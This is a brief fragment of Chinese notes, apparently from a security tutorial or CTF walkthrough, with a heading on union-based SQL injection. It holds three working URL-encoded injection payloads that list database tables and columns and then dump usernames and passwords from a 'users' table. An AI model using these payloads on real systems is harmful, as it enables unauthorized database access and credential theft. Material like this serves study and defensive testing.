第一章

Base64编码隐藏

第五章

联合注入

1
2
3
?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database(); //查询表名
?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27; //查询表下列名
?id=-1%20union%20select%201,2,group_concat(id,username,password)%20from%20users;//final